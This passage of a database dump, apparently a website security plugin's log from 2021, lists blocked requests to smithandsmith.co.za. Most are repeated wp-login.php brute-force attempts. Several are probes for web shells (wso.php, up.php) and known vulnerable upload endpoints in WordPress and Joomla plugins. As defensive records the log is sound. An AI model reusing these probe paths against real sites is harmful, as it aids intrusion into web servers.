16:03:20','139.155.204.29','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4658,'2021-09-18 00:47:12','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/Dandelion/style.css','404shield',''),(4659,'2021-09-18 01:33:29','107.180.88.164','https://smithandsmith.co.za/wp-login.php','404shield',''),(4660,'2021-09-18 19:58:26','62.84.115.148','https://smithandsmith.co.za/wp-login.php','404shield',''),(4661,'2021-09-18 19:58:27','62.84.115.148','https://smithandsmith.co.za/wp-login.php','404shield',''),(4662,'2021-09-18 19:58:30','62.84.115.148','https://smithandsmith.co.za/wp-login.php','404shield',''),(4663,'2021-09-18 22:23:18','104.248.94.25','https://smithandsmith.co.za/wp-login.php','404shield',''),(4664,'2021-09-19 08:31:13','45.66.157.242','https://www.smithandsmith.co.za/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','404shield',''),(4665,'2021-09-19 08:31:24','45.66.157.242','https://www.smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(4666,'2021-09-19 08:31:30','45.66.157.242','https://www.smithandsmith.co.za/wp-content/db_cache.php','404shield',''),(4667,'2021-09-19 10:12:45','35.225.94.95','https://smithandsmith.co.za/wp-login.php','404shield',''),(4668,'2021-09-19 10:12:45','35.225.94.95','https://smithandsmith.co.za/wp-login.php','404shield',''),(4669,'2021-09-19 10:12:45','35.225.94.95','https://smithandsmith.co.za/wp-login.php','404shield',''),(4670,'2021-09-19 10:12:48','162.214.198.70','https://smithandsmith.co.za/wp-login.php','404shield',''),(4671,'2021-09-19 10:12:48','162.214.198.70','https://smithandsmith.co.za/wp-login.php','404shield',''),(4672,'2021-09-19 10:12:48','162.214.198.70','https://smithandsmith.co.za/wp-login.php','404shield',''),(4673,'2021-09-19 21:50:00','52.163.223.126','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4674,'2021-09-20 13:28:19','185.191.34.215','https://smithandsmith.co.za/wp-login.php','404shield',''),(4675,'2021-09-20 14:28:23','20.55.41.242','http://www.smithandsmith.co.za/','muashield',''),(4676,'2021-09-20 14:28:23','20.55.41.242','http://www.smithandsmith.co.za/','muashield',''),(4677,'2021-09-20 14:28:28','20.55.41.242','http://www.smithandsmith.co.za/index.php/component/users','sessionshield',''),(4678,'2021-09-21 05:14:39','165.227.118.36','http://www.smithandsmith.co.za/','muashield',''),(4679,'2021-09-21 05:14:39','165.227.118.36','http://www.smithandsmith.co.za/','muashield',''),(4680,'2021-09-21 05:14:42','165.227.118.36','http://www.smithandsmith.co.za/index.php/component/users','sessionshield',''),(4681,'2021-09-21 13:31:56','45.61.146.241','https://smithandsmith.co.za/wp-login.php','404shield',''),(4682,'2021-09-21 21:04:16','37.0.10.46','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(4683,'2021-09-21 21:29:15','185.81.157.200','https://smithandsmith.co.za/wp-admin/install.php','404shield',''),(4684,'2021-09-22 07:49:38','116.21.29.213','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4685,'2021-09-22 17:56:25','67.205.3.168','https://smithandsmith.co.za/wp-login.php','404shield',''),(4686,'2021-09-22 17:56:25','67.205.3.168','https://smithandsmith.co.za/wp-login.php','404shield',''),(4687,'2021-09-22 21:58:21','74.58.216.47','http://www.smithandsmith.co.za/','muashield',''),(4688,'2021-09-22 21:58:21','74.58.216.47','http://www.smithandsmith.co.za/','muashield',''),(4689,'2021-09-22 21:58:26','74.58.216.47','http://www.smithandsmith.co.za/index.php/component/users','sessionshield',''),(4690,'2021-09-23 09:57:41','34.229.215.162','https://www.smithandsmith.co.za//wp-content/wp-logins.php','404shield',''),(4691,'2021-09-23 09:58:27','34.229.215.162','https://www.smithandsmith.co.za//wp-content/wp-admin.php','404shield',''),(4692,'2021-09-23 09:58:38','34.229.215.162','https://www.smithandsmith.co.za//wp-admin.php','404shield',''),(4693,'2021-09-23 10:50:00','65.21.125.213','https://smithandsmith.co.za/wp-login.php','404shield',''),(4694,'2021-09-23 12:20:33','23.228.109.147','https://smithandsmith.co.za/wp-content/pluginsOFF/advanced_file_manager_5/php/connector.minimal.php','404shield',''),(4695,'2021-09-23 21:05:28','185.191.34.215','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(4696,'2021-09-24 04:46:53','45.66.157.242','https://smithandsmith.co.za/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','404shield',''),(4697,'2021-09-24 04:47:08','45.66.157.242','https://smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(4698,'2021-09-24 04:47:11','45.66.157.242','https://smithandsmith.co.za/wp-content/db_cache.php','404shield',''),(4699,'2021-09-24 12:29:50','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/cherry-plugin/admin/css/tinymce-shortcodes.css','404shield',''),(4700,'2021-09-24 20:33:06','216.245.215.122','https://smithandsmith.co.za/wp-login.php','404shield',''),(4701,'2021-09-25 03:04:25','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=upload.php','404shield',''),(4702,'2021-09-25 16:38:54','178.128.234.242','http://www.smithandsmith.co.za/?gf_page=upload','dfishield',''),(4703,'2021-09-25 16:38:56','178.128.234.242','https://www.smithandsmith.co.za/wp-content/_input_3_raiz0.php5','404shield',''),(4704,'2021-09-25 16:38:59','178.128.234.242','https://www.smithandsmith.co.za/wp-admin/admin-ajax.php','404shield',''),(4705,'2021-09-25 18:55:44','178.128.234.242','http://www.smithandsmith.co.za/','muashield',''),(4706,'2021-09-25 18:55:44','178.128.234.242','http://www.smithandsmith.co.za/','muashield',''),(4707,'2021-09-25 18:55:50','178.128.234.242','http://www.smithandsmith.co.za/index.php/component/users','sessionshield',''),(4708,'2021-09-25 22:07:59','68.183.68.148','https://smithandsmith.co.za/wp-login.php','404shield',''),(4709,'2021-09-27 00:31:40','154.13.48.35','https://smithandsmith.co.za/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','404shield',''),(4710,'2021-09-27 00:32:03','154.13.48.35','https://smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(4711,'2021-09-27 00:32:05','154.13.48.35','https://smithandsmith.co.za/wp-content/db_cache.php','404shield',''),(4712,'2021-09-27 12:59:45','37.0.11.216','https://www.smithandsmith.co.za/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','404shield',''),(4713,'2021-09-27 13:00:11','37.0.11.216','https://www.smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(4714,'2021-09-27 13:00:18','37.0.11.216','https://www.smithandsmith.co.za/wp-content/db_cache.php','404shield',''),(4715,'2021-09-28 11:11:43','194.163.159.35','https://smithandsmith.co.za/wp-login.php','404shield',''),(4716,'2021-09-28 11:50:46','212.83.188.138','https://smithandsmith.co.za/wp-login.php','404shield',''),(4717,'2021-09-28 15:58:49','103.124.95.104','https://smithandsmith.co.za/wp-login.php','404shield',''),(4718,'2021-09-29 00:53:09','37.0.10.46','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(4719,'2021-09-29 18:18:56','93.114.234.242','https://smithandsmith.co.za/wp-login.php','404shield',''),(4720,'2021-09-29 18:18:56','93.114.234.242','https://smithandsmith.co.za/wp-login.php','404shield',''),(4721,'2021-09-29 18:18:56','93.114.234.242','https://smithandsmith.co.za/wp-login.php','404shield',''),(4722,'2021-09-29 18:18:56','93.114.234.242','https://smithandsmith.co.za/wp-login.php','404shield',''),(4723,'2021-09-29 18:18:56','93.114.234.242','https://smithandsmith.co.za/wp-login.php','404shield',''),(4724,'2021-09-29 18:18:56','93.114.234.242','https://smithandsmith.co.za/wp-login.php','404shield',''),(4725,'2021-09-29 18:18:56','93.114.234.242','https://smithandsmith.co.za/wp-login.php','404shield',''),(4726,'2021-09-30 04:13:09','38.83.97.99','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4727,'2021-10-01 00:36:35','200.74.245.170','https://smithandsmith.co.za/wp-login.php','404shield',''),(4728,'2021-10-01 17:07:58','20.49.20.35','https://smithandsmith.co.za/wp-login.php','404shield',''),(4729,'2021-10-01 19:35:50','20.49.20.35','https://smithandsmith.co.za/wp-login.php','404shield',''),(4730,'2021-10-01 20:01:42','20.49.20.35','https://smithandsmith.co.za/wp-login.php','404shield',''),(4731,'2021-10-02 12:46:42','45.227.78.5','https://smithandsmith.co.za/wp-login.php','404shield',''),(4732,'2021-10-02 12:46:44','45.227.78.5','http://smithandsmith.co.za/administrator/','adminpw',''),(4733,'2021-10-03 17:00:18','135.181.1.182','https://smithandsmith.co.za/wp-login.php','404shield',''),(4734,'2021-10-04 18:24:06','194.36.45.73','https://smithandsmith.co.za/wp-login.php','404shield',''),(4735,'2021-10-04 18:24:06','194.36.45.73','https://smithandsmith.co.za/wp-login.php','404shield',''),(4736,'2021-10-05 23:00:53','77.247.127.153','https://smithandsmith.co.za///wp-content/plugins/ubh/up.php','404shield',''),(4737,'2021-10-06 03:53:07','35.236.172.75','https://smithandsmith.co.za/wp-login.php','404shield',''),(4738,'2021-10-06 03:53:08','35.236.172.75','https://smithandsmith.co.za/wp-login.php','404shield',''),(4739,'2021-10-06 06:35:24','37.0.10.46','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(4740,'2021-10-06 11:01:45','78.157.40.245','https://smithandsmith.co.za/wp-login.php','404shield',''),(4741,'2021-10-07 03:17:11','192.227.158.117','https://smithandsmith.co.za/wp-content/uploads/upload_index.php?auth=f02pz3831W0DTtLgq26L','404shield',''),(4742,'2021-10-07 07:32:57','93.113.111.34','https://smithandsmith.co.za/wp-login.php','404shield',''),(4743,'2021-10-07 17:11:20','206.189.147.58','https://smithandsmith.co.za/wp-login.php','404shield',''),(4744,'2021-10-07 18:41:58','207.148.86.30','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4745,'2021-10-08 16:17:57','23.228.109.147','https://smithandsmith.co.za/wp-login.php','404shield',''),(4746,'2021-10-08 23:33:53','165.227.204.57','https://smithandsmith.co.za/wp-login.php','404shield',''),(4747,'2021-10-09 07:28:04','5.188.62.76','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(4748,'2021-10-09 08:20:56','120.79.8.125','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4749,'2021-10-09 21:46:13','23.129.64.184','http://smithandsmith.co.za/contact/','httpbl',''),(4750,'2021-10-09 23:01:24','74.91.8.36','https://smithandsmith.co.za/wp-admin/install.php?step=2','404shield',''),(4751,'2021-10-10 06:33:44','37.0.8.34','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(4752,'2021-10-11 04:46:48','213.52.117.179','https://smithandsmith.co.za/wp-login.php','404shield',''),(4753,'2021-10-11 17:23:16','103.129.178.69','https://smithandsmith.co.za/wp-login.php','404shield',''),(4754,'2021-10-12 02:57:46','54.179.28.141','https://smithandsmith.co.za/wp-login.php','404shield',''),(4755,'2021-10-12 21:53:38','217.160.186.183','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(4756,'2021-10-13 05:43:42','110.4.43.210','https://smithandsmith.co.za/wp-login.php','404shield',''),(4757,'2021-10-13 07:18:43','37.0.10.46','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(4758,'2021-10-13 14:14:48','3.25.147.41','https://smithandsmith.co.za/wp-login.php','404shield',''),(4759,'2021-10-13 21:41:40','85.215.221.196','https://www.smithandsmith.co.za/wp-content/plugins/ubh/up.php','404shield',''),(4760,'2021-10-13 21:41:42','85.215.221.196','https://www.smithandsmith.co.za/wp-content/plugins/ubh/wso.php','404shield',''),(4761,'2021-10-13 21:42:16','85.215.221.196','https://www.smithandsmith.co.za/wp-content/wp-logins.php','404shield',''),(4762,'2021-10-14 05:20:59','178.128.54.239','https://smithandsmith.co.za/wp-login.php','404shield',''),(4763,'2021-10-14 05:21:00','178.128.54.239','https://smithandsmith.co.za/wp-login.php','404shield',''),(4764,'2021-10-14 13:06:27','67.205.61.124','https://smithandsmith.co.za/wp-login.php','404shield',''),(4765,'2021-10-14 22:46:11','198.54.120.93','https://smithandsmith.co.za/wp-login.php','404shield',''),(4766,'2021-10-16 07:54:01','1.14.17.83','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4767,'2021-10-17 17:24:11','35.182.168.217','https://smithandsmith.co.za/wp-login.php','404shield',''),(4768,'2021-10-17 17:24:11','35.182.168.217','https://smithandsmith.co.za/wp-login.php','404shield',''),(4769,'2021-10-17 17:24:12','35.182.168.217','https://smithandsmith.co.za/wp-login.php','404shield',''),(4770,'2021-10-18 13:05:17','66.115.173.18','https://smithandsmith.co.za/wp-login.php','404shield',''),(4771,'2021-10-19 03:06:54','185.147.212.80','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4772,'2021-10-19 03:06:55','185.147.212.80','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4773,'2021-10-19 14:00:51','23.88.127.101','https://smithandsmith.co.za/wp-login.php','404shield',''),(4774,'2021-10-19 17:34:46','67.211.219.84','https://smithandsmith.co.za/wp-login.php','404shield',''),(4775,'2021-10-19 17:34:47','67.211.219.84','https://smithandsmith.co.za/wp-login.php','404shield',''),(4776,'2021-10-19 18:28:14','23.146.241.19','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(4777,'2021-10-20 15:29:35','141.85.216.231','https://smithandsmith.co.za/wp-login.php','404shield',''),(4778,'2021-10-21 05:26:40','131.72.221.190','https://smithandsmith.co.za/wp-login.php','404shield',''),(4779,'2021-10-21 17:26:04','158.255.80.210','https://smithandsmith.co.za/wp-login.php','404shield',''),(4780,'2021-10-22 03:50:12','64.111.109.226','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4781,'2021-10-23 04:37:46','47.74.17.225','https://smithandsmith.co.za/wp-login.php','404shield',''),(4782,'2021-10-23 04:37:46','47.74.17.225','https://smithandsmith.co.za/wp-login.php','404shield',''),(4783,'2021-10-23 13:50:59','37.0.8.34','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(4784,'2021-10-23 17:38:50','52.67.189.37','https://smithandsmith.co.za/wp-login.php','404shield',''),(4785,'2021-10-23 17:38:50','52.67.189.37','https://smithandsmith.co.za/wp-login.php','404shield',''),(4786,'2021-10-23 17:38:50','52.67.189.37','https://smithandsmith.co.za/wp-login.php','404shield',''),(4787,'2021-10-24 14:24:34','31.210.20.154','https://www.smithandsmith.co.za/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','404shield',''),(4788,'2021-10-24 14:27:20','31.210.20.154','https://www.smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(4789,'2021-10-24 14:28:03','31.210.20.154','https://www.smithandsmith.co.za/wp-content/db_cache.php','404shield',''),(4790,'2021-10-24 19:20:35','23.88.7.34','https://www.smithandsmith.co.za/wp-admin/css/','404shield',''),(4791,'2021-10-24 23:38:20','23.88.7.34','https://www.smithandsmith.co.za/wp-admin/css/','404shield',''),(4792,'2021-10-25 01:53:17','65.21.247.250','https://smithandsmith.co.za/wp-content/plugins/dzs-zoomsounds/savepng.php?location=FoxTest.php','404shield',''),(4793,'2021-10-25 08:00:47','197.155.158.21','https://smithandsmith.co.za/wp-login.php','404shield',''),(4794,'2021-10-25 08:00:47','197.155.158.21','https://smithandsmith.co.za/wp-login.php','404shield',''),(4795,'2021-10-25 10:24:13','212.193.30.144','http://smithandsmith.co.za/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form','dfishield',''),(4796,'2021-10-25 13:00:28','45.9.250.120','https://smithandsmith.co.za/wp-login.php','404shield',''),(4797,'2021-10-25 13:00:31','45.9.250.120','https://smithandsmith.co.za/wp-login.php','404shield',''),(4798,'2021-10-26 16:42:16','81.169.195.91','https://smithandsmith.co.za/wp-login.php','404shield',''),(4799,'2021-10-26 19:26:23','179.185.180.30','https://smithandsmith.co.za/wp-login.php','404shield',''),(4800,'2021-10-26 19:26:45','179.185.180.30','http://smithandsmith.co.za/administrator/','adminpw',''),(4801,'2021-10-26 23:29:50','37.0.10.46','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(4802,'2021-10-27 21:26:28','220.86.0.33','https://smithandsmith.co.za/wp-login.php','404shield',''),(4803,'2021-10-27 21:26:31','220.86.0.33','http://smithandsmith.co.za/administrator/','adminpw',''),(4804,'2021-10-28 02:29:54','65.0.22.5','https://smithandsmith.co.za/wp-login.php','404shield',''),(4805,'2021-10-28 02:29:54','65.0.22.5','https://smithandsmith.co.za/wp-login.php','404shield',''),(4806,'2021-10-28 11:47:54','20.112.72.198','https://smithandsmith.co.za/wp-login.php','404shield',''),(4807,'2021-10-28 11:51:30','20.112.72.198','https://smithandsmith.co.za/wp-login.php','404shield',''),(4808,'2021-10-28 11:59:16','20.112.72.198','https://smithandsmith.co.za/wp-login.php','404shield',''),(4809,'2021-10-28 12:02:48','20.112.72.198','https://smithandsmith.co.za/wp-login.php','404shield',''),(4810,'2021-10-28 12:17:16','20.112.72.198','https://smithandsmith.co.za/wp-login.php','404shield',''),(4811,'2021-10-28 17:48:25','198.54.120.93','https://smithandsmith.co.za/wp-login.php','404shield',''),(4812,'2021-10-29 18:17:10','62.210.209.245','https://smithandsmith.co.za/wp-login.php','404shield',''),(4813,'2021-10-29 19:27:26','61.12.67.132','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4814,'2021-10-30 09:11:28','37.0.11.64','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(4815,'2021-10-30 16:22:28','216.158.230.167','https://smithandsmith.co.za/wp-login.php','404shield',''),(4816,'2021-10-31 20:58:06','178.254.50.20','https://smithandsmith.co.za/wp-login.php','404shield',''),(4817,'2021-10-31 20:58:06','178.254.50.20','https://smithandsmith.co.za/wp-login.php','404shield',''),(4818,'2021-11-01 03:36:31','142.93.34.169','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4819,'2021-11-01 12:09:19','37.0.10.117','https://www.smithandsmith.co.za/wp-admin/css/','404shield',''),(4820,'2021-11-01 12:10:03','37.0.10.117','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(4821,'2021-11-01 17:01:06','109.120.162.207','https://smithandsmith.co.za/wp-login.php','404shield',''),(4822,'2021-11-02 07:17:02','103.214.61.35','https://www.smithandsmith.co.za/wp-content/debug.log','404shield',''),(4823,'2021-11-02 07:38:06','141.98.9.3','https://smithandsmith.co.za/wp-login.php','404shield',''),(4824,'2021-11-02 07:38:07','141.98.9.3','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4825,'2021-11-02 16:38:39','139.155.249.13','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4826,'2021-11-02 20:05:02','69.163.251.1','https://smithandsmith.co.za/wp-login.php','404shield',''),(4827,'2021-11-02 21:45:58','37.0.10.46','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(4828,'2021-11-03 02:24:22','167.71.111.16','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4829,'2021-11-03 19:24:32','18.235.0.115','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(4830,'2021-11-04 04:27:53','212.193.30.144','http://smithandsmith.co.za/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form','dfishield',''),(4831,'2021-11-04 09:03:20','34.64.218.102','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4832,'2021-11-05 00:50:58','178.62.100.74','https://smithandsmith.co.za/wp-login.php','404shield',''),(4833,'2021-11-05 03:35:23','31.47.0.36','https://smithandsmith.co.za/wp-login.php','404shield',''),(4834,'2021-11-05 05:49:17','31.202.101.40','https://smithandsmith.co.za/wp-login.php','404shield',''),(4835,'2021-11-05 21:27:16','212.193.30.144','http://smithandsmith.co.za/','muashield',''),(4836,'2021-11-05 21:27:16','212.193.30.144','http://smithandsmith.co.za/','muashield',''),(4837,'2021-11-06 02:02:19','74.208.103.228','https://smithandsmith.co.za/wp-login.php','404shield',''),(4838,'2021-11-06 21:22:12','45.32.20.16','https://smithandsmith.co.za/wp-login.php','404shield',''),(4839,'2021-11-06 21:22:12','45.32.20.16','https://smithandsmith.co.za/wp-login.php','404shield',''),(4840,'2021-11-07 02:41:26','67.205.31.50','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4841,'2021-11-07 21:34:04','195.211.45.155','https://smithandsmith.co.za/wp-login.php','404shield',''),(4842,'2021-11-07 21:34:04','195.211.45.155','https://smithandsmith.co.za/wp-login.php','404shield',''),(4843,'2021-11-08 04:34:31','103.146.202.150','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4844,'2021-11-08 21:31:06','37.0.11.64','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(4845,'2021-11-09 05:37:44','157.245.38.42','https://smithandsmith.co.za/wp-login.php','404shield',''),(4846,'2021-11-09 05:37:44','157.245.38.42','https://smithandsmith.co.za/wp-login.php','404shield',''),(4847,'2021-11-09 22:58:17','37.0.10.46','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(4848,'2021-11-10 00:38:33','50.28.41.149','https://smithandsmith.co.za/wp-login.php','404shield',''),(4849,'2021-11-10 09:15:30','15.237.122.54','https://www.smithandsmith.co.za/wp-content/wp-logins.php','404shield',''),(4850,'2021-11-10 09:15:32','15.237.122.54','https://www.smithandsmith.co.za/wp-content/wp-admin.php','404shield',''),(4851,'2021-11-10 09:15:32','15.237.122.54','https://www.smithandsmith.co.za/wp-admin.php','404shield',''),(4852,'2021-11-10 17:11:52','20.112.72.198','https://smithandsmith.co.za/wp-login.php','404shield',''),(4853,'2021-11-10 23:45:29','161.35.30.72','https://smithandsmith.co.za/wp-login.php','404shield',''),(4854,'2021-11-11 05:42:56','194.36.191.196','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4855,'2021-11-11 17:33:52','193.176.30.216','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4856,'2021-11-11 17:33:52','193.176.30.216','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4857,'2021-11-11 17:44:11','200.58.109.114','https://smithandsmith.co.za/wp-login.php','404shield',''),(4858,'2021-11-11 21:02:43','18.216.174.40','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4859,'2021-11-11 21:02:52','18.216.174.40','https://smithandsmith.co.za/wp-login.php','404shield',''),(4860,'2021-11-12 19:54:22','20.112.72.198','https://smithandsmith.co.za/wp-login.php','404shield',''),(4861,'2021-11-12 19:54:22','20.112.72.198','https://smithandsmith.co.za/wp-login.php','404shield',''),(4862,'2021-11-12 19:54:22','20.112.72.198','https://smithandsmith.co.za/wp-login.php','404shield',''),(4863,'2021-11-13 04:09:41','185.3.235.206','https://smithandsmith.co.za/wp-login.php','404shield',''),(4864,'2021-11-13 07:16:04','31.220.41.16','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4865,'2021-11-14 00:29:55','185.31.175.235','https://smithandsmith.co.za/contact/','httpbl',''),(4866,'2021-11-14 00:30:00','185.31.175.235','https://smithandsmith.co.za/','httpbl',''),(4867,'2021-11-14 00:30:02','185.31.175.235','https://smithandsmith.co.za/','httpbl',''),(4868,'2021-11-14 09:31:11','178.165.70.181','https://smithandsmith.co.za/wp-login.php','404shield',''),(4869,'2021-11-14 09:31:12','178.165.70.181','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4870,'2021-11-14 10:25:06','103.52.152.212','https://smithandsmith.co.za/wp-content/uploads/upload_index.php?auth=f02pz3831W0DTtLgq26L','404shield',''),(4871,'2021-11-15 05:03:53','91.203.111.125','https://smithandsmith.co.za/wp-login.php','404shield',''),(4872,'2021-11-15 08:06:20','103.8.25.22','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4873,'2021-11-15 21:11:05','162.214.151.12','https://smithandsmith.co.za/wp-login.php','404shield',''),(4874,'2021-11-15 23:15:01','91.202.45.27','https://smithandsmith.co.za/wp-login.php?action=register','404shield',''),(4875,'2021-11-16 12:35:13','5.2.69.50','http://smithandsmith.co.za/contact/','httpbl',''),(4876,'2021-11-16 12:35:14','5.2.69.50','http://smithandsmith.co.za/','httpbl',''),(4877,'2021-11-16 19:29:54','37.0.10.46','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(4878,'2021-11-17 05:19:37','192.64.150.25','https://smithandsmith.co.za/wp-login.php','404shield',''),(4879,'2021-11-17 05:19:37','192.64.150.25','https://smithandsmith.co.za/wp-login.php','404shield',''),(4880,'2021-11-17 09:34:26','37.0.10.231','https://www.smithandsmith.co.za/wp-admin/css/','404shield',''),(4881,'2021-11-17 09:54:21','51.15.160.148','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4882,'2021-11-17 14:48:01','159.69.121.108','https://smithandsmith.co.za/wp-login.php','404shield',''),(4883,'2021-11-18 05:09:31','148.72.210.140','https://smithandsmith.co.za/wp-login.php','404shield',''),(4884,'2021-11-18 19:43:45','161.97.178.213','https://smithandsmith.co.za/wp-login.php','404shield',''),(4885,'2021-11-19 02:58:27','104.248.152.43','http://www.smithandsmith.co.za/','muashield',''),(4886,'2021-11-19 02:58:28','104.248.152.43','http://www.smithandsmith.co.za/','muashield',''),(4887,'2021-11-19 02:58:31','104.248.152.43','http://www.smithandsmith.co.za/index.php/component/users','sessionshield',''),(4888,'2021-11-19 06:47:17','199.195.253.119','https://www.smithandsmith.co.za/','httpbl',''),(4889,'2021-11-19 20:49:21','23.101.121.111','https://www.smithandsmith.co.za/wp-admin/css/','404shield',''),(4890,'2021-11-20 06:09:06','185.165.116.22','https://smithandsmith.co.za/wp-login.php','404shield',''),(4891,'2021-11-20 06:09:06','185.165.116.22','https://smithandsmith.co.za/wp-login.php','404shield',''),(4892,'2021-11-21 02:45:11','20.124.198.70','https://www.smithandsmith.co.za/wp-admin/css/','404shield',''),(4893,'2021-11-21 09:57:33','139.59.181.37','https://smithandsmith.co.za/wp-login.php','404shield',''),(4894,'2021-11-21 14:05:04','167.86.103.174','https://smithandsmith.co.za/wp-login.php','404shield',''),(4895,'2021-11-21 17:41:25','20.124.198.70','https://www.smithandsmith.co.za/wp-admin/css/','404shield',''),(4896,'2021-11-22 06:54:36','94.177.40.243','https://smithandsmith.co.za/wp-login.php','404shield',''),(4897,'2021-11-22 06:54:36','94.177.40.243','https://smithandsmith.co.za/wp-login.php','404shield',''),(4898,'2021-11-22 10:18:15','13.236.51.55','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4899,'2021-11-22 12:17:25','42.193.17.124','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4900,'2021-11-23 07:15:08','212.193.30.143','https://smithandsmith.co.za/contact/','httpbl',''),(4901,'2021-11-23 12:41:00','20.124.198.70','https://www.smithandsmith.co.za/wp-admin/css/','404shield',''),(4902,'2021-11-25 08:12:02','67.205.31.50','https://smithandsmith.co.za/wp-login.php','404shield',''),(4903,'2021-11-25 08:12:02','67.205.31.50','https://smithandsmith.co.za/wp-login.php','404shield',''),(4904,'2021-11-25 08:49:31','42.193.9.45','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4905,'2021-11-25 13:52:28','37.0.10.46','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(4906,'2021-11-25 17:29:03','20.124.198.70','https://www.smithandsmith.co.za/wp-admin/css/','404shield',''),(4907,'2021-11-26 07:59:26','103.8.25.22','https://smithandsmith.co.za/wp-login.php','404shield',''),(4908,'2021-11-26 20:55:23','88.135.37.49','https://smithandsmith.co.za/wp-login.php','404shield',''),(4909,'2021-11-27 14:13:10','198.11.177.173','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4910,'2021-11-28 21:11:44','66.115.173.18','https://smithandsmith.co.za/wp-login.php','404shield',''),(4911,'2021-11-28 22:28:05','176.113.115.10','https://smithandsmith.co.za/wp-login.php','404shield',''),(4912,'2021-11-28 22:28:05','176.113.115.10','https://smithandsmith.co.za/wp-login.php','404shield',''),(4913,'2021-11-28 22:28:06','176.113.115.10','https://smithandsmith.co.za/wp-login.php','404shield',''),(4914,'2021-11-29 14:58:24','184.171.244.231','https://smithandsmith.co.za/wp-login.php','404shield',''),(4915,'2021-11-30 04:43:57','195.133.18.60','https://smithandsmith.co.za/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','404shield',''),(4916,'2021-11-30 04:44:40','195.133.18.60','https://smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(4917,'2021-11-30 04:45:13','195.133.18.60','https://smithandsmith.co.za/wp-content/db_cache.php','404shield',''),(4918,'2021-11-30 20:26:03','108.178.39.50','https://smithandsmith.co.za/wp-login.php','404shield',''),(4919,'2021-11-30 20:26:03','108.178.39.50','https://smithandsmith.co.za/wp-login.php','404shield',''),(4920,'2021-12-01 01:11:49','37.0.10.46','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(4921,'2021-12-01 04:17:06','139.59.33.202','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4922,'2021-12-01 17:06:59','162.214.114.242','https://smithandsmith.co.za/wp-login.php','404shield',''),(4923,'2021-12-02 03:54:29','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/seo-watcher/ofc/php-ofc-library/ofc_upload_image.php','404shield',''),(4924,'2021-12-02 14:23:19','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/whatsmyrank-devenc/php-ofc-library/ofc_upload_image.php','404shield',''),(4925,'2021-12-02 22:59:17','37.0.10.231','https://www.smithandsmith.co.za/wp-admin/css/','404shield',''),(4926,'2021-12-02 23:00:08','37.0.10.231','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(4927,'2021-12-03 01:49:06','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php','404shield',''),(4928,'2021-12-03 09:47:43','20.124.198.70','https://www.smithandsmith.co.za/wp-admin/css/','404shield',''),(4929,'2021-12-03 